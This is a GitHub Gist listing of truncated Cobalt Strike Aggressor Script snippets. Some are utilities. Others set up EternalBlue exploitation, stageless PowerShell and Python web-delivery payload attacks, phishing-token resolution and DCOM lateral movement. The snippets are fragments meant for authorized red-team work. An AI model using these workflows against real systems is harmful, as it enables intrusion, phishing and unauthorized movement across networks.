Skip to content

Instantly share code, notes, and snippets.

Raphael Mudge rsmudge

View GitHub Profile
rsmudge / callany.cna
Last active Dec 12, 2019
Create a hidden Beacon console and pass a command+args to it for execution.
View callany.cna
import java.awt.event.ActionEvent;
# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
# we make the console a static var because each console we create subscribes to a bunch of stuff
# and requires a manual step [normally performed by a Window close event] to clean up these things.
rsmudge / initial.cna
Created Feb 20, 2019
How to automate Beacon to execute a sequence of tasks with each checkin...
View initial.cna
# Demonstrate how to queue tasks to execute with each checkin...
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
sub stuffToDo {
# Tasks for first checkin
rsmudge / mouse.cna
Created Mar 21, 2018
How to add a popup handler to a Swing component in Aggressor Script/Sleep
View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
rsmudge / safedelete.cna
Created Sep 1, 2017
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
View safedelete.cna
# safe delete in file browser right-click menu
popup filebrowser {
item "&Download" {
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
rsmudge / eternalblue.cna
Last active Jun 9, 2020
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
View eternalblue.cna
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
rsmudge / stagelesspython.cna
Created Apr 26, 2017
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
rsmudge / tokenToEmail.cna
Created Mar 31, 2017
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
View tokenToEmail.cna
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
rsmudge / stagelessweb.cna
Last active Jun 23, 2020
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
rsmudge / comexec.cna
Created Jan 6, 2017
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
View comexec.cna
# Lateral Movement alias
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
# port foreward alias in Beacon and SSH
# pull common code into a function
sub _portfwd {
if ($2 eq "stop") {
btask($1, "Tasked session to stop forward to $3");
call("beacons.pivot_stop_port", $null, $3);
You can’t perform that action at this time.